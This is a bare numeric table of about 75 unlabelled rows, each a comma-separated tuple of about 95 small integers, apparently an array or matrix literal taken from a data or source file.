(3,3,3,3,3,3,3,3,2,2,2,3,2,3,2,2,3,3,3,3,3,2,3,3,3,3,3,2,2,3,3,2,3,3,2,3,3,3,2,1,3,3,3,3,3,3,2,3,2,3,3,3,2,3,3,3,3,3,3,3,1,1,0,3,3,3,2,2,3,3,2,2,3,0,3,3,3,3,2,1,2,1,2,2,3,2,2,3,2,3,2,3,3,2,3,),
(2,3,3,3,3,2,3,2,2,2,0,1,0,2,0,2,3,2,3,3,3,1,3,3,3,1,1,0,0,3,3,1,0,3,2,3,3,3,2,1,3,0,3,3,3,1,2,3,2,3,3,3,2,3,3,0,3,2,3,3,1,0,0,3,0,1,0,0,0,3,0,2,3,0,1,2,0,2,0,0,0,0,0,1,0,0,0,0,0,2,2,3,3,0,3,),
(8,9,9,9,9,8,9,8,7,7,6,7,6,8,3,8,6,8,8,9,9,8,9,9,9,7,7,7,8,7,9,8,5,8,8,9,8,8,8,6,7,5,7,7,8,4,8,9,8,7,9,9,8,6,6,5,8,8,9,7,7,6,0,6,8,7,7,7,7,9,8,8,7,5,7,8,7,8,7,6,7,7,8,7,8,6,8,6,6,8,8,9,6,5,8,),
(5,6,6,6,6,5,6,5,4,4,4,4,4,5,3,5,5,5,6,6,6,5,6,6,6,4,4,3,5,6,6,5,5,6,5,6,5,5,5,3,4,5,5,4,6,5,5,6,5,5,6,6,5,5,5,5,6,5,6,5,4,5,0,4,4,4,5,5,5,6,5,5,6,3,4,5,4,5,5,3,5,3,3,4,5,2,2,4,3,5,5,6,5,5,6,),
(9,10,8,9,8,9,10,9,9,8,4,9,5,9,7,8,10,9,9,9,9,8,10,9,8,9,9,5,9,9,9,8,9,9,9,8,9,9,8,8,10,9,9,10,9,9,8,9,8,9,9,8,9,9,9,9,10,9,10,10,8,9,0,10,9,9,9,9,9,9,8,9,10,7,8,9,8,8,9,7,9,7,8,7,9,6,6,9,6,8,8,10,9,9,9,),
(12,10,13,12,12,10,12,13,10,10,9,11,9,12,8,13,8,10,10,11,10,13,10,11,13,11,11,12,13,7,8,13,10,9,13,9,12,12,13,10,11,10,11,11,9,10,13,9,13,11,10,8,13,8,8,10,7,9,13,9,11,11,2,9,13,12,12,12,12,12,13,11,12,10,11,12,12,12,12,11,12,12,13,11,13,11,13,11,11,8,12,13,11,10,9,),
(0,1,1,1,1,0,1,0,0,0,0,0,0,0,0,0,1,0,1,1,1,0,1,1,1,0,0,0,0,1,1,0,0,1,0,1,1,1,0,0,1,0,1,1,1,0,0,1,0,1,1,1,0,1,1,0,1,0,1,1,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,0,1,),
(2,3,2,2,2,2,3,1,4,2,1,3,1,3,3,1,3,2,3,3,3,1,3,2,2,2,3,1,1,2,3,1,2,3,1,2,3,3,1,4,3,2,3,3,3,2,2,3,2,3,3,2,2,3,3,3,3,2,4,3,4,1,0,3,2,3,1,1,1,3,4,4,3,4,2,4,2,2,1,2,1,3,2,2,1,1,1,2,4,3,2,4,3,1,3,),
(3,3,4,4,4,4,3,4,1,4,4,3,4,3,2,4,2,3,3,4,4,4,3,4,4,4,4,4,4,3,3,4,3,3,4,4,3,3,4,1,3,4,3,3,3,3,4,3,4,3,4,4,4,2,2,4,3,3,4,2,2,4,0,2,4,3,4,4,4,4,4,3,4,2,3,4,4,4,4,3,4,3,4,4,4,4,4,3,4,3,4,4,3,4,3,),
(6,7,7,7,6,6,7,7,5,5,2,5,2,6,2,7,5,6,7,7,7,7,7,7,7,6,6,6,7,7,7,7,4,7,7,6,6,6,7,4,5,1,5,5,7,3,7,7,7,5,7,6,7,5,5,3,7,5,7,6,5,5,0,5,7,6,6,6,6,7,7,6,7,4,5,6,6,6,6,5,6,6,7,5,7,6,7,5,6,4,6,7,5,0,7,),
(10,8,10,8,8,10,10,11,8,6,11,9,11,10,7,11,6,8,7,11,6,11,9,9,9,9,9,10,6,5,8,11,6,7,11,6,10,10,11,8,9,10,9,9,7,6,11,7,11,9,10,6,11,6,6,6,5,7,11,6,9,10,0,7,11,10,11,11,11,11,11,9,10,8,9,10,10,10,11,9,11,9,10,9,10,8,8,8,8,6,9,11,9,10,7,),
(2,0,0,1,2,1,1,1,1,0,0,2,0,2,1,0,0,2,2,0,2,0,1,1,1,2,2,0,0,1,0,0,2,0,0,0,2,2,0,0,2,2,2,2,0,2,0,0,0,2,1,0,0,0,0,2,0,2,2,0,2,0,0,0,2,2,1,0,1,1,2,2,2,1,2,2,2,2,1,0,0,2,1,0,1,0,0,2,1,2,1,2,2,0,0,),
(4,2,4,2,2,4,4,5,2,0,5,3,5,4,1,5,0,2,1,5,0,5,3,3,3,3,3,4,0,0,2,5,0,1,5,0,4,4,5,2,3,4,3,3,1,0,5,1,5,3,4,0,5,0,0,0,0,1,5,0,3,4,0,1,5,4,5,5,5,5,5,3,4,2,3,4,4,4,5,3,5,3,4,3,4,2,2,2,2,0,3,5,3,4,1,),
(1,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,1,1,0,1,0,0,0,0,1,1,0,0,0,0,0,1,0,0,0,1,0,0,0,1,1,1,1,0,1,0,0,0,1,0,0,0,0,0,1,0,1,1,0,0,0,0,0,1,1,0,0,0,0,0,0,1,0,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,1,0,1,1,0,0,),
(8,9,7,8,7,7,9,7,8,7,5,7,5,8,1,6,9,7,8,8,8,6,9,8,7,7,7,5,6,8,8,6,5,8,6,7,8,8,6,7,9,5,8,9,8,7,7,8,7,8,8,7,8,8,8,6,9,7,9,9,7,4,0,9,6,7,5,5,5,8,6,8,9,6,7,8,7,7,5,5,5,5,6,7,6,6,6,5,6,6,7,9,8,4,8,),
(8,8,9,9,9,9,8,9,6,9,9,7,9,8,6,9,7,8,8,9,9,9,8,9,9,9,9,9,9,8,8,9,8,8,9,9,8,8,9,6,7,9,7,7,8,8,9,8,9,7,9,9,9,7,7,8,8,7,9,7,7,8,0,6,9,8,9,9,9,9,9,8,9,7,7,9,9,9,9,8,9,8,9,9,9,9,9,8,9,8,9,9,7,9,8,),
(8,6,6,7,7,7,7,7,6,6,6,8,6,8,6,6,6,8,8,6,8,6,7,7,7,8,8,6,6,6,6,6,8,6,6,6,7,7,6,5,6,8,6,6,6,8,6,6,6,8,7,6,6,6,6,8,6,8,8,6,6,6,0,6,8,8,7,6,7,6,6,6,7,4,6,8,7,7,7,6,6,6,7,6,7,6,6,8,6,7,7,8,6,6,6,),
(8,7,7,8,7,8,7,8,6,7,4,8,4,8,6,7,6,8,8,7,8,7,7,7,7,8,8,5,7,7,7,6,8,7,7,7,7,7,7,5,7,8,7,7,7,8,7,7,7,8,8,7,7,6,6,8,7,8,8,6,6,7,0,6,8,8,7,7,8,7,6,6,7,5,7,8,7,7,7,6,7,6,7,7,8,6,6,8,6,7,7,8,7,7,7,),
(7,7,7,7,7,7,7,7,5,7,6,6,6,6,5,7,6,7,7,7,7,7,7,7,7,7,7,5,7,7,7,7,7,7,7,7,6,6,7,4,5,7,6,5,7,7,7,7,7,6,7,7,7,6,6,7,7,6,7,6,5,7,0,5,6,6,7,7,7,7,7,6,7,5,5,7,7,7,7,5,7,5,6,7,7,6,5,6,6,6,6,7,6,7,7,),
(9,8,9,8,9,9,9,10,7,7,10,9,10,9,8,10,8,9,8,10,8,10,8,8,8,9,9,9,7,8,8,10,8,8,10,7,9,9,10,7,9,9,9,9,8,8,10,8,10,8,9,7,10,8,8,8,8,9,10,8,8,9,0,8,10,9,10,10,10,10,10,8,9,7,9,9,9,9,10,8,10,8,9,8,9,7,7,8,7,9,8,10,9,9,8,),
(8,8,8,9,7,9,8,9,8,6,9,7,9,8,6,9,8,8,8,9,9,9,8,8,8,7,7,8,9,5,7,9,8,7,9,5,8,8,9,6,8,9,7,8,7,8,9,7,9,7,9,6,9,7,7,9,8,7,9,8,8,9,0,8,9,8,9,9,9,9,9,8,8,6,7,9,8,8,9,7,9,7,8,7,9,6,8,7,6,6,8,9,7,9,7,),
(8,9,9,9,9,9,9,9,8,8,9,7,9,8,6,9,9,8,9,9,9,9,9,9,9,7,7,8,9,9,9,9,8,9,9,9,9,9,9,6,8,9,9,8,9,8,9,9,9,9,9,9,9,9,9,9,9,8,9,8,7,9,0,8,9,8,9,9,9,9,9,8,9,6,7,9,8,8,9,7,9,7,8,7,9,6,7,7,6,8,8,9,9,9,9,),
(6,7,6,7,6,6,7,6,6,6,3,5,3,6,3,5,7,6,7,7,7,5,7,7,6,5,5,4,5,7,7,5,5,7,5,6,7,7,5,4,5,5,7,5,7,5,5,7,6,7,7,6,6,7,7,5,7,5,7,6,5,5,0,6,5,5,5,5,5,7,4,6,7,4,5,6,5,5,5,4,5,3,5,5,5,5,4,5,5,5,6,7,7,5,7,),
(7,7,7,7,7,7,7,7,6,6,6,7,6,7,5,7,7,7,7,7,7,7,7,7,7,7,7,5,7,7,7,7,7,7,7,7,7,7,7,4,6,7,7,6,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,6,5,7,0,6,7,7,7,7,7,7,7,6,7,4,6,7,6,6,7,5,7,5,6,6,7,5,4,7,5,6,6,7,7,7,7,),
(7,8,8,8,8,7,8,8,6,8,8,6,8,7,5,8,6,7,7,8,8,8,8,8,8,8,8,8,8,7,8,8,7,7,8,8,7,7,8,5,6,7,6,6,7,7,8,8,8,6,8,8,8,6,6,7,7,7,8,6,6,7,0,5,8,7,8,8,8,8,8,7,8,6,6,7,8,8,8,7,8,7,8,8,8,8,8,7,8,7,8,8,6,7,7,),
(2,0,0,2,2,1,1,2,0,2,0,2,0,2,1,2,0,2,2,0,2,1,1,2,2,2,2,0,0,1,1,2,2,0,2,2,2,1,2,0,2,2,2,2,0,2,2,0,2,2,1,2,2,0,0,2,0,2,2,0,0,0,0,0,2,2,1,0,1,2,1,1,2,0,2,2,2,2,1,1,0,0,2,2,2,2,1,2,2,2,1,2,2,0,0,),
(2,0,0,1,2,1,1,1,1,1,0,2,0,2,1,1,0,2,2,0,2,0,1,1,1,2,2,0,0,1,0,1,2,0,1,1,2,2,1,0,2,2,2,2,0,2,1,0,1,2,1,1,1,0,0,2,0,2,2,0,2,0,0,0,2,2,1,0,1,1,2,2,2,1,2,2,2,2,1,0,0,2,1,1,1,1,0,2,1,2,1,2,2,0,0,),
(11,12,11,12,11,11,12,11,10,10,6,11,7,11,10,10,9,11,12,12,12,10,12,12,11,11,11,3,6,12,12,9,10,12,10,11,11,11,10,9,11,10,11,11,12,10,10,12,11,10,12,11,11,9,10,10,12,11,12,11,10,8,1,9,11,10,9,8,9,12,10,11,12,7,11,11,11,11,9,9,8,9,10,10,9,6,6,10,8,11,11,12,11,6,12,),
(10,8,11,11,10,11,10,11,8,8,6,9,6,10,8,11,6,10,10,9,11,11,10,10,11,9,9,10,11,5,8,11,10,7,11,7,10,10,11,8,9,11,9,9,7,10,11,7,11,9,11,6,11,6,6,11,4,9,11,7,9,11,0,7,11,10,11,11,11,10,11,9,10,8,9,11,10,10,11,9,11,10,11,9,11,9,11,9,9,8,10,11,9,11,7,),
(11,9,11,10,10,10,11,12,9,8,11,10,11,11,8,12,7,8,11,11,8,12,9,10,11,10,10,12,11,3,9,12,8,8,12,8,11,11,12,9,10,10,10,10,8,7,12,8,12,10,10,8,12,7,7,7,5,7,12,8,10,10,1,8,12,11,12,12,11,11,12,10,11,9,10,11,11,11,12,10,12,10,12,10,11,10,11,9,10,6,12,12,9,10,8,),
(6,7,7,7,7,6,7,7,5,7,4,5,4,6,3,7,6,6,7,7,7,6,7,7,7,7,7,5,6,7,7,7,5,7,7,7,6,6,7,4,5,4,6,5,7,4,7,7,7,6,7,7,7,6,6,4,7,6,7,6,5,4,0,5,6,5,6,5,5,7,6,6,7,5,5,6,7,7,6,6,5,5,7,7,7,7,6,6,7,6,6,7,6,4,7,),
(9,9,10,10,10,8,9,10,7,10,9,8,9,9,6,10,5,8,9,9,10,10,9,10,10,10,10,10,10,8,9,10,8,8,10,10,9,9,10,7,8,8,8,8,8,8,10,9,10,8,9,10,10,6,6,8,8,8,10,7,8,8,0,6,10,9,10,10,9,10,10,9,10,8,8,9,10,10,10,9,10,9,10,10,10,10,10,9,10,9,10,10,8,8,8,),
(14,12,12,13,13,13,13,13,12,11,11,14,11,14,12,12,12,14,14,12,14,12,13,13,13,14,14,11,12,12,12,12,14,12,12,11,13,13,12,11,13,14,13,13,12,14,12,12,12,14,13,11,12,12,12,14,12,14,14,12,12,11,3,12,14,14,13,12,13,12,12,12,13,10,13,14,13,13,13,12,12,12,13,12,13,11,12,14,11,13,13,14,13,11,12,),
(9,10,10,10,10,9,10,10,8,10,9,8,9,9,6,10,9,9,10,10,10,9,10,10,10,10,10,8,9,10,10,10,8,10,10,10,9,9,10,7,8,9,9,8,10,8,10,10,10,9,10,10,10,9,9,9,10,9,10,9,8,9,0,8,9,8,9,9,9,10,9,9,10,8,8,9,10,10,9,9,9,8,10,10,10,10,9,9,10,9,9,10,9,9,10,),
(10,10,10,10,10,10,10,10,9,9,5,10,5,10,8,9,10,10,10,10,10,9,10,10,10,10,10,5,10,10,10,9,10,10,10,10,10,10,9,7,9,10,10,9,10,10,9,10,9,10,10,10,10,10,10,10,10,10,10,9,8,10,0,9,10,10,10,10,10,10,9,9,10,7,9,10,9,9,10,8,10,8,9,9,10,7,7,10,8,9,9,10,10,10,10,),
(12,12,13,13,13,12,12,13,10,12,13,11,13,12,9,13,9,11,12,13,13,13,12,12,13,13,13,13,13,11,12,13,11,11,13,12,12,12,13,10,11,12,11,11,11,11,13,12,13,11,12,13,13,9,9,12,11,11,13,10,11,12,2,9,13,12,13,13,13,13,13,11,12,10,11,12,12,12,13,12,13,12,13,12,13,13,13,12,13,11,13,13,11,12,11,),
(9,6,5,9,8,9,8,9,7,5,6,9,6,9,7,8,6,9,9,6,9,8,8,8,8,9,9,5,9,7,6,8,9,7,9,5,8,8,8,6,8,9,8,8,6,9,8,6,8,9,9,4,9,6,6,9,7,9,9,5,7,9,0,5,9,9,9,9,9,7,8,7,8,6,8,9,8,8,9,7,9,7,8,7,9,5,5,9,6,8,8,9,8,9,6,),
(6,7,7,7,7,6,7,6,6,6,6,5,6,6,4,6,7,6,7,7,7,6,7,7,7,6,6,5,2,7,7,6,4,7,6,7,7,7,6,4,5,5,7,5,7,3,6,7,6,7,7,7,6,7,7,4,7,6,7,6,5,5,0,6,6,5,6,6,6,7,6,6,7,4,5,6,6,6,6,4,6,5,5,6,5,4,4,4,5,6,6,7,7,5,7,),
(12,10,12,12,11,13,12,13,11,9,8,11,8,12,11,13,10,11,11,10,12,13,11,12,10,11,11,10,11,10,10,13,11,10,13,10,12,12,13,11,11,13,11,11,10,11,13,10,13,11,13,10,13,10,10,11,10,11,13,9,11,12,2,9,11,12,13,13,13,11,13,11,12,11,11,13,12,12,13,11,13,11,11,11,13,10,9,11,11,11,11,13,11,13,10,),
(14,14,11,14,12,14,14,14,14,10,11,13,11,13,12,13,14,14,14,13,14,13,14,13,13,13,13,11,11,11,13,12,14,12,13,11,13,13,13,12,14,14,12,14,13,14,13,12,12,13,14,10,13,10,12,14,14,13,14,14,14,11,3,14,13,13,13,13,14,13,12,14,14,11,12,14,13,13,13,12,13,12,12,12,14,10,11,13,10,12,13,14,13,11,13,),
(3,4,3,3,5,3,4,4,3,3,3,5,3,5,4,3,4,5,4,3,3,3,4,3,3,5,5,3,3,4,3,3,4,3,3,3,5,4,3,2,5,4,5,5,3,4,3,3,3,3,3,3,3,3,3,4,4,5,5,4,3,3,0,4,5,3,3,3,3,4,4,3,5,1,5,5,5,5,3,3,3,3,4,3,3,3,3,4,3,5,3,5,5,3,3,),
(7,8,7,7,7,7,8,7,7,7,7,6,7,7,4,7,8,6,7,7,7,7,8,7,7,7,7,7,7,7,7,7,6,7,7,7,7,7,7,6,8,7,7,8,7,6,7,7,7,7,7,7,7,7,7,7,8,6,8,8,6,7,0,8,7,6,7,7,7,7,7,7,8,5,6,7,7,7,7,6,7,6,7,7,7,7,7,6,7,6,7,8,7,7,7,),
(12,10,8,12,10,12,11,12,10,9,7,11,7,11,10,11,10,12,12,10,12,11,11,11,11,11,11,7,12,9,10,11,12,10,12,8,11,11,11,9,10,12,10,10,10,12,11,10,11,11,12,8,12,10,10,12,10,11,12,9,10,12,1,9,11,11,12,12,12,10,11,10,11,9,10,12,11,11,12,10,12,10,10,10,12,8,8,11,9,10,11,12,10,12,10,),
(10,7,3,10,10,10,9,10,8,3,5,10,5,10,9,9,8,10,10,7,10,9,9,9,9,10,10,4,9,9,7,8,10,8,9,7,10,9,9,7,10,10,10,10,8,10,9,8,8,10,10,6,9,4,4,10,8,10,10,5,9,9,0,6,10,10,9,9,10,9,9,9,10,8,10,10,10,10,9,8,9,9,9,8,10,6,6,10,8,10,9,10,10,9,6,),
(16,15,13,16,16,16,15,16,14,14,13,16,13,16,15,15,15,16,16,15,16,15,15,15,15,16,16,13,15,15,15,14,16,15,15,13,16,15,15,13,16,16,16,16,15,16,15,15,14,16,16,13,15,15,15,16,15,16,16,14,15,15,5,14,16,16,15,15,16,15,15,15,16,14,16,16,16,16,15,14,15,15,15,14,16,13,13,16,14,16,15,16,16,15,15,),
(15,16,12,13,12,14,16,14,16,12,12,14,12,15,11,12,16,13,15,15,12,12,16,14,14,14,14,12,12,12,15,12,12,14,12,13,12,12,12,14,16,12,12,16,15,14,12,14,13,14,14,12,15,12,14,15,16,14,16,16,16,12,5,16,12,15,12,12,12,15,12,16,16,13,14,16,12,12,12,11,12,11,12,12,12,12,12,12,12,12,14,16,15,12,15,),
(12,12,13,13,13,13,12,13,10,12,13,11,13,12,10,13,10,11,12,13,13,13,12,12,13,13,13,13,13,11,12,13,11,11,13,12,12,12,13,10,11,13,11,11,11,11,13,12,13,11,13,13,13,10,10,12,11,11,13,10,11,12,2,9,13,12,13,13,13,13,13,11,12,10,11,13,12,12,13,12,13,12,13,12,13,13,13,12,13,11,13,13,11,13,11,),
(11,12,12,12,12,11,12,12,10,12,9,10,9,11,8,12,10,11,11,12,12,11,12,12,12,12,12,10,11,11,12,12,10,11,12,12,11,11,12,9,10,8,10,10,11,8,12,12,12,10,12,12,12,10,10,8,11,11,12,10,10,9,1,9,11,10,11,10,10,12,11,11,12,10,10,11,12,12,11,11,10,10,12,12,12,12,11,11,12,11,11,12,10,8,11,),
(13,13,14,14,15,13,14,14,14,13,14,15,14,15,15,14,13,15,14,14,14,14,13,13,14,15,15,14,14,14,13,14,14,12,14,13,15,15,14,14,15,14,15,15,13,14,14,13,14,12,13,14,14,10,10,14,13,15,15,11,15,13,4,11,15,13,14,14,14,14,15,15,15,15,15,15,15,15,14,13,14,15,14,13,14,14,14,14,15,15,14,15,15,13,12,),
(11,10,10,11,13,10,12,12,12,10,10,13,10,13,12,10,11,13,12,10,11,10,11,11,11,13,13,9,10,12,10,10,12,10,11,10,13,13,10,11,13,12,13,13,11,12,10,11,10,10,11,10,10,9,9,12,11,13,13,9,13,10,2,9,13,11,11,10,11,12,13,13,13,12,13,13,13,13,11,11,10,13,12,10,11,9,8,12,12,13,11,13,13,10,10,),
(7,6,7,8,6,8,7,8,5,5,8,7,8,7,5,8,6,7,7,8,8,8,7,7,6,7,7,7,8,6,6,8,7,6,8,5,7,7,8,5,6,8,6,6,6,7,8,6,8,7,8,5,8,6,6,8,6,7,8,5,6,8,0,5,8,7,8,8,8,8,8,6,7,5,6,8,7,7,8,6,8,6,7,6,8,5,6,7,5,6,7,8,6,8,6,),
(10,11,9,10,9,10,11,9,11,10,6,9,6,10,8,8,11,9,11,11,11,8,11,10,10,9,9,6,6,9,11,6,8,11,8,8,11,11,8,9,11,8,11,11,11,9,9,11,9,11,11,6,10,11,11,10,11,9,11,11,11,6,0,11,9,10,7,7,7,11,8,11,11,8,9,11,9,9,7,7,6,7,8,9,7,6,6,8,6,9,10,11,11,6,11,),
(10,11,11,11,11,11,11,11,9,11,11,9,11,10,8,11,10,10,10,11,11,11,11,11,11,11,11,11,11,10,11,11,10,10,11,11,10,10,11,8,9,11,10,9,10,10,11,11,11,10,11,11,11,10,10,10,10,10,11,9,9,10,0,9,11,10,11,11,11,11,11,10,11,9,9,11,11,11,11,10,11,10,11,11,11,11,11,10,11,10,11,11,10,11,10,),
(14,15,13,14,13,14,15,13,14,14,10,13,10,14,8,12,15,13,15,15,15,12,15,14,14,13,13,10,10,14,15,11,9,15,12,13,15,15,12,12,14,10,15,14,15,12,13,15,13,15,15,10,13,15,15,12,15,13,15,14,13,10,4,14,10,13,10,10,10,15,10,14,15,12,13,14,10,10,10,9,10,9,10,13,10,10,10,9,10,9,14,15,15,10,15,),
(18,19,19,19,19,18,19,18,18,19,17,17,17,18,14,18,19,18,19,19,19,18,19,19,19,19,19,17,18,19,19,18,17,19,18,19,19,19,18,17,19,16,19,19,19,17,19,19,19,19,19,19,18,19,19,16,19,18,19,19,17,16,8,19,18,17,17,17,17,19,18,18,19,17,17,18,19,19,17,17,17,17,18,19,18,18,18,17,18,18,18,19,19,16,19,),
(13,10,9,12,12,12,12,12,12,9,8,13,8,13,11,11,10,13,13,10,13,11,12,12,12,13,13,8,10,11,10,10,13,11,11,9,12,12,11,10,11,13,11,11,10,13,11,10,10,13,12,9,11,10,10,13,11,13,13,10,12,10,2,10,13,13,12,11,12,11,11,12,12,9,11,13,12,12,12,11,11,11,12,11,12,9,9,13,9,12,12,13,10,10,10,),
(14,15,13,14,12,14,15,13,14,14,10,13,10,14,8,12,15,13,15,15,15,12,15,14,14,13,13,10,11,13,15,11,9,15,12,12,15,15,12,12,13,9,15,13,15,11,13,15,13,15,15,12,13,15,15,12,15,13,15,14,13,10,4,14,11,13,10,10,10,15,11,14,15,12,13,14,11,11,10,10,10,10,11,13,11,11,11,10,11,11,14,15,15,9,15,),
(10,9,9,10,8,10,9,10,8,8,5,9,5,9,8,10,9,10,10,9,10,10,9,9,9,9,9,7,10,9,9,10,10,9,10,8,9,9,10,7,8,10,9,8,9,10,10,9,10,9,10,8,10,9,9,10,9,9,10,8,8,10,0,8,9,9,10,10,10,9,10,8,9,7,8,10,9,9,10,8,10,8,8,8,10,7,7,9,7,8,9,10,9,10,9,),
(1,1,1,1,1,1,2,1,3,1,1,2,1,2,2,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,3,1,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,1,3,1,3,1,0,1,1,2,1,1,1,1,3,3,1,2,1,3,1,1,1,1,1,3,2,1,1,1,1,1,2,3,1,3,1,1,1,),
(8,7,5,8,9,7,9,8,9,4,6,10,6,9,10,6,7,9,8,6,8,6,7,7,7,9,10,5,7,8,6,6,8,6,7,6,9,9,6,9,9,8,9,9,7,8,6,7,6,8,7,5,7,2,2,8,7,9,9,1,9,7,0,6,9,8,7,7,7,8,10,9,9,10,9,9,9,9,7,8,7,9,8,6,7,4,5,8,10,9,7,10,9,7,6,),
(3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,),
(8,7,8,10,8,10,9,10,7,7,9,8,9,9,7,9,6,9,9,9,10,9,9,9,8,8,8,8,10,6,7,9,9,6,10,7,9,9,9,7,8,10,8,8,6,9,9,7,9,8,10,8,10,6,6,10,6,8,10,5,8,10,0,6,9,9,10,10,10,9,9,8,9,7,8,10,9,9,10,8,10,8,8,8,10,8,8,8,8,7,9,10,8,10,6,),
(8,8,2,5,1,0,10,7,7,4,0,9,6,10,2,2,3,3,4,1,2,2,4,4,3,9,9,0,0,0,4,1,0,1,1,0,2,4,0,0,6,3,0,1,0,0,0,0,0,0,3,0,0,0,0,0,0,1,8,1,8,1,11,7,5,2,4,4,4,5,3,2,7,5,1,7,0,2,3,2,1,2,6,5,3,2,0,2,3,3,5,10,6,0,7,),
(3,4,2,4,3,3,4,3,2,2,0,2,0,3,0,2,3,3,4,4,4,2,4,4,3,2,2,0,0,4,4,1,0,4,2,3,3,3,2,1,2,0,3,2,4,0,2,4,3,3,4,0,3,3,3,0,4,2,4,3,2,0,0,2,0,2,0,0,0,4,0,3,4,0,2,3,0,0,0,0,0,0,0,2,0,0,0,0,0,0,3,4,3,0,4,),
(5,3,6,6,6,6,5,6,3,5,6,4,6,5,3,6,2,5,5,6,6,6,4,5,6,6,6,6,6,3,4,6,5,2,6,5,5,5,6,3,4,6,4,4,2,5,6,2,6,4,6,6,6,2,2,5,2,4,6,3,4,5,0,2,6,5,6,6,6,6,6,4,5,3,4,6,5,5,6,5,6,5,6,5,6,6,6,5,6,4,6,6,4,6,2,),
(8,6,8,9,7,9,8,9,6,4,9,8,9,8,6,9,4,8,8,9,9,9,8,8,7,8,8,8,9,6,6,9,8,6,9,4,8,8,9,6,7,9,7,7,5,8,9,5,9,8,9,4,9,4,4,9,6,8,9,4,7,9,0,5,9,8,9,9,9,9,9,7,8,6,7,9,8,8,9,7,9,7,8,7,9,6,7,8,6,7,8,9,7,9,5,),
(6,4,7,7,7,4,6,7,4,6,2,6,2,6,5,7,4,6,5,5,7,7,4,6,7,7,7,6,7,5,5,7,5,3,7,6,6,6,7,4,6,5,6,6,4,5,7,4,7,5,5,7,7,3,3,5,4,6,7,4,5,5,0,3,7,6,6,6,6,6,7,5,6,4,6,6,6,6,6,6,6,6,7,6,7,7,7,6,7,6,6,7,6,4,3,),
(6,6,6,6,7,6,6,6,7,6,6,7,6,7,6,6,6,7,6,6,6,6,6,6,6,7,7,6,6,6,6,6,6,6,6,6,7,6,6,4,7,6,7,7,6,6,6,6,6,6,6,6,6,6,6,6,6,7,7,6,7,6,0,6,7,6,6,6,6,6,6,7,7,4,7,7,7,7,6,5,6,5,6,6,6,6,6,6,6,7,6,7,7,6,6,),
(6,4,7,6,6,6,6,7,4,4,6,6,6,6,4,7,3,6,6,6,6,7,5,5,7,6,6,7,7,4,4,7,6,4,7,3,6,6,7,4,5,6,5,5,3,6,7,3,7,6,6,6,7,2,2,6,4,6,7,3,5,6,0,3,7,6,7,7,6,6,7,5,6,4,5,6,6,6,7,5,7,6,7,5,7,6,7,6,6,5,7,7,5,6,3,),
(5,6,4,5,5,5,6,5,5,5,3,5,3,5,4,5,6,5,6,6,6,5,6,5,5,5,5,5,3,5,6,5,4,6,5,4,6,6,5,4,6,4,6,6,6,4,5,6,5,6,6,2,5,6,6,4,6,5,6,6,5,3,0,6,5,4,5,5,4,6,5,5,6,3,5,5,5,5,5,3,5,3,5,4,4,3,2,4,3,5,5,6,6,3,6,),
(8,7,6,7,8,7,7,7,7,5,6,8,6,8,8,6,6,8,8,7,8,6,7,7,7,8,8,6,6,7,7,6,8,7,6,6,8,8,6,7,8,8,8,8,7,8,6,7,6,8,7,5,6,4,5,8,7,8,8,6,8,5,0,4,8,8,7,6,7,7,8,8,8,8,8,8,8,8,7,6,6,8,7,6,7,5,6,8,8,8,7,8,8,5,7,),
(9,6,8,8,9,8,8,8,7,7,8,9,8,9,8,8,7,9,9,8,9,8,8,8,8,9,9,8,8,8,6,8,9,7,8,7,9,8,8,6,9,9,9,9,7,9,8,7,8,9,8,8,8,4,4,9,7,9,9,5,8,8,0,5,9,9,8,8,8,8,8,8,9,7,9,9,9,9,8,7,8,8,8,7,8,8,8,9,8,9,8,9,9,8,5,),
(2,3,2,3,4,2,3,3,2,3,2,4,2,4,3,2,3,4,3,3,3,2,3,3,3,4,4,2,2,3,3,2,3,3,2,3,4,3,2,1,4,3,4,4,3,3,3,3,3,3,3,3,2,3,3,3,3,4,4,3,2,2,0,3,4,2,2,2,2,3,3,2,4,1,4,4,4,4,2,2,2,2,3,3,2,2,2,3,2,4,2,4,4,2,3,),
(5,6,4,5,5,5,6,4,6,5,4,5,4,5,5,4,6,5,6,6,6,4,6,5,5,5,5,4,4,4,6,4,5,6,4,5,6,6,4,5,6,5,6,6,6,5,5,6,5,6,6,5,5,6,6,5,6,5,6,6,6,4,0,6,5,5,4,4,4,6,5,6,6,5,5,6,5,5,4,4,4,5,4,5,4,4,4,5,5,5,5,6,6,4,6,),
(10,7,8,10,10,10,9,10,8,8,5,10,5,10,8,10,7,10,10,7,10,9,9,9,10,10,10,6,7,8,7,10,10,8,10,8,9,9,10,7,9,10,9,9,7,10,10,7,10,10,10,10,10,6,6,10,8,10,10,7,8,7,0,6,10,10,9,9,10,9,9,8,9,7,9,10,9,9,9,9,9,8,10,8,10,10,9,10,10,9,9,10,9,6,6,),
(4,2,2,4,4,4,3,4,3,2,2,4,2,4,3,3,2,4,4,2,4,3,3,3,3,4,4,2,2,3,2,2,4,2,3,2,4,3,3,1,4,4,4,4,2,4,3,2,2,4,4,2,3,2,2,4,2,4,4,2,3,1,0,2,4,4,3,3,4,3,3,3,4,2,4,4,4,4,3,2,3,3,3,2,4,2,2,4,2,4,3,4,4,1,2,),
(13,10,13,13,12,13,12,13,11,11,13,12,13,12,11,13,9,13,13,13,13,13,12,12,13,12,12,13,13,10,10,13,13,10,13,11,12,12,13,10,11,13,11,11,9,13,13,9,13,12,13,12,13,8,8,13,10,12,13,9,11,13,2,9,13,12,13,13,13,13,13,11,12,10,11,13,12,12,13,11,13,12,13,11,13,12,13,12,12,11,13,13,11,13,9,),
